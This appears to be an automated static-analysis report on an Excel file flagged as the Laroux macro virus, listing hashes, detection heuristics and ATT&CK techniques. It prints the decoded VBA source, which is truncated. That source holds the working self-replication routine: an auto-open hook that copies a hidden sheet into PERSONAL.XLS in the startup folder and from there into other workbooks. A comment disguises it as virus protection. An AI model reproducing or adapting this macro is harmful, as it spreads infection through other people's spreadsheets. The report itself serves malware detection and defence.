Xls.Trojan.Laroux-30 — Office (OLE) malware analysis

Static analysis result for SHA-256 0118c3b2936a1b2b…

MALICIOUS

Office (OLE)

30.0 KB Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 5630403828aa7ac81318f5b468ef1414 SHA-1: c89d76c0f1427f301039c7e29d678eb5a176247a SHA-256: 0118c3b2936a1b2bd8d81b92ca18fa8b555da894c40768a6ce8a4a08427c1326
180 Risk Score

Malware Insights

Xls.Trojan.Laroux-30 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Xls.Trojan.Laroux-30. It contains a VBA macro with an Auto_Open subroutine, which is a common technique for executing malicious code upon opening the document. The macro attempts to save itself as PERSONAL.XLS in the startup path, indicating an attempt to establish persistence or facilitate further execution.

Heuristics 3

  • ClamAV: Xls.Trojan.Laroux-30 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Laroux-30
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5877 bytes
SHA-256: 5d6658707173ecdd2a39ce5c4d8f44664b4b42ef6d8aba2479f853db7dd44566
Detection
ClamAV: Xls.Trojan.Laroux-30
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Program"

'
' This macro program for virus protection & Schedule control program
'       by Burinthorn  Thong-o.
'
'
'This part for declaration globle variable
'
Dim First_col, Last_col As Integer
    Const start_row = 22
    Const finish_row = 66
    Const start_col = 18
    Const finish_col = 50
'
'end section
'

Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnSheetActivate = "check_files"
End Sub

Sub check_files()
Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "PERSONAL.XLS")
    If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
    Select Case whichfile
    Case 10
        Application.ScreenUpdating = False
        n4$ = ActiveWorkbook.Name
        Sheets("Program").Visible = True
        Sheets("Program").Select
        Sheets("Program").Copy
        With ActiveWorkbook
            .Title = ""
            .Subject = ""
            .Author = ""
            .Keywords = ""
            .Comments = ""
        End With
        newname$ = ActiveWorkbook.Name
        c4$ = CurDir()
        ChDir Application.StartupPath
        ActiveWindow.Visible = False
        Workbooks(newname$).SaveAs Filename:=Application.StartupPath & "/" & "PERSONAL.XLS", _
                FileFormat:=xlNormal, password:="", writerespassword:="", _
                ReadOnlyRecommended:=False, CreateBackup:=False
        ChDir c4$
        Workbooks(n4$).Sheets("Program").Visible = False
        Application.OnSheetActivate = ""
        Application.ScreenUpdating = True
        Application.OnSheetActivate = "personal.xls!check_files"
    Case 1
        Application.ScreenUpdating = False
        n4$ = ActiveWorkbook.Name
        p4$ = ActiveWorkbook.Path
        s$ = Workbooks(n4$).Sheets(1).Name
        If s$ <> "Program" Then
            Workbooks("PERSONAL.XLS").Sheets("Program").Copy before:=Workbooks(n4$).Sheets(1)
            Workbooks(n4$).Sheets("Program").Visible = False
        Else
        End If
        Application.OnSheetActivate = ""
        Application.ScreenUpdating = True
        Application.OnSheetActivate = "personal.xls!check_files"
    Case Else
    End Select
End Sub

Sub C_Paint()
Attribute C_Paint.VB_ProcData.VB_Invoke_Func = " \n14"
    Selection.Interior.ColorIndex = xlNone
    Selection.Font.ColorIndex = 0
    With Selection.Borders(xlRight)
        .Weight = xlThin
        .ColorIndex = xlAutomatic
    End With
End Sub

Function Get_rng(Pmt)
Attribute Get_rng.VB_ProcData.VB_Invoke_Func = " \n14"
    Set Get_rng = Application.InputBox(prompt:=Pmt, _
        Title:="Input Range Dialoque!", Type:=8)
End Function

Sub Underline()
Attribute Underline.VB_ProcData.VB_Invoke_Func = " \n14"
    ActiveCell.Offset(1, 3).Font.Underline = xlDouble
End Sub

Function actv_sheet(sht)
Attribute actv_sheet.VB_ProcData.VB_Invoke_Func = " \n14"
    If Not (Worksheets(sht).Activate) Then
        Worksheets(sht).Select
    End If
End Function

Function Begin_col(Rw) As Integer
Attribute Begin_col.VB_ProcData.VB_Invoke_Func = " \n14"
Dim Counter As Integer
    Counter = 1
    Do While (Cells(Rw, Counter).Interior.ColorIndex = xlNone)
        Counter = Counter + 1
        If Counter > 49 Then
            Exit Do
        End If
    Loop
    Begin_col = Counter
    If Begin_col < First_col Then
        First_col = Begin_col
    End If
End Function

Function End_col(Rw, Beg)
Attribute End_col.VB_ProcData.VB_Invoke_Func = " \n14"
Dim i As Integer
    For i = Beg To 50 Step 1
        If Cells(Rw, i).Interior.ColorIndex = xlNone Then
            Exit For
        End If
    End_col = i
    Next i
    If End_col > Last_col Then
        Last_col = End_col
    End If
End Function

Function Put_on(Rw, fag)
Attribute Put_on.VB_ProcData.VB_Invoke_Func = " \n14"
Dim Beg_time, End_time As Integer
    If Not (Cells(Rw, 5
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.